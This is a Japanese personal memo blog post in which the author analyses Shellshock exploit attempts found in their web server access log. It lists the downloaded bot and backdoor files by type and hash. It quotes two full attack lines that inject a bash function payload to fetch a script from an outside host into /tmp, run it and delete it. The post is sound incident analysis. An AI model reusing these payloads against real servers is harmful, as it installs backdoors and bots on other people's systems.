僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。
access.logに、
194.209.220.10 - - [28/Sep/2014:16:57:30 +0900] "GET / HTTP/1.0" 200 3897 "-" "() { :;}; /bin/bash -c \" wget http://stablehost.us/bots/regular.bot -O /tmp/sh; curl -o /tmp/sh http://stablehost.us/bots/regular.bot; sh /tmp/sh; rm -rf /tmp/sh\""
なる一行。検索すると
似た報告が色々。
で、regular.botをdownloadしてみた。
他に4つばかりプログラムを/tmpの下にダウンロードして
実行し、crontabを書き換えて、削除する内容になっていた。
それも頂戴して見てみた。
$ ls -l 合計 1116 -rw-rw-r-- 1 user group 982256 9月 29 08:11 a -rw-rw-r-- 1 user group 42436 9月 29 08:11 darwin -rw-rw-r-- 1 user group 39130 9月 29 08:11 kaiten.c -rw-rw-r-- 1 user group 66395 9月 29 08:11 pl -rw-rw-r-- 1 user group 701 9月 29 08:11 regular.bot $ file * a: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0xd5fb250b91b5baf9874e986fd7d14f88e6d4e1d2, not stripped darwin: Mach-O 64-bit executable kaiten.c: ASCII English text, with very long lines pl: data regular.bot: ASCII text $ sha1sum * 889b8f612fe790b786f1184bebe9dd5bf86ce8f6 a e75b8133404dcea606a04a8e4c03b0af8bec6d22 darwin 658daf96fa06636bb50af577a980529aa3282499 kaiten.c 62aed37b3e6fbe8ff6552e3cf87b78ed473a9a43 pl edde96085b3a9c097b474d6345ab4166e28e4cff regular.bot $ sha256sum * 3cafb672d0bc1acfb4eb506050f71a2acf1b239a36102a101b4d52ce75749372 a 61c46e434a117294148a53997d9c1d7bca724e8c9cf429d0eb92e93585bdfac6 darwin 47e71a4de9351e90a884978f2984796c1d770cbb3010cfbe2d8600cf259b6832 kaiten.c a2f7839d37825f097a17ff03ed6fd5205a97fb4f2651945390e347804fcd8391 pl 1bd24270449047e2d0df9f7a5ecf58fd0647e25b55328c52c6cff6629a118530 regular.bot
"kaiten.c"は1000行近くあるCのソース。もちろん侵入先でビルド、実行する。
これも
かなりメジャーなものと見えた。
"pl"はPerl Script。これも2000行近くあった。
"darwin"を見ると、MacOSXもターゲットらしい。チェックサムで
検索すると、
Tsunamiとか呼ばれるバックドアの模様。
bashの脆弱性攻撃もう一丁。
173.45.100.18 - - [29/Sep/2014:10:18:21 +0900] "GET /cgi-bin/hi HTTP/1.0" 404 770 "-" "() { :;}; /bin/bash -c \" cd /tmp; wget http://213.5.67.223/ji; curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji; rm -rf /tmp/ji; rm -rf /tmp/ji*\""
ji はwget できた。が、juratは"Not Found"であった。
LinuxNet Perlbotらしい。
$ ls -l 合計 20 -rw-rw-r-- 1 makoto makoto 16680 9月 29 00:44 ji $ file ji ji: a /usr/bin/perl\015 script, ASCII text executable, with CRLF line terminators $ sha1sum ji dc788bfb3ef12016cdb53c904ef47cfd3f5d2a97 ji $ sha256sum ji ef42439cb6b8dd9d7d28147efe2282502b4081487cb8df42cb5e9fade5b660d3 ji
リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。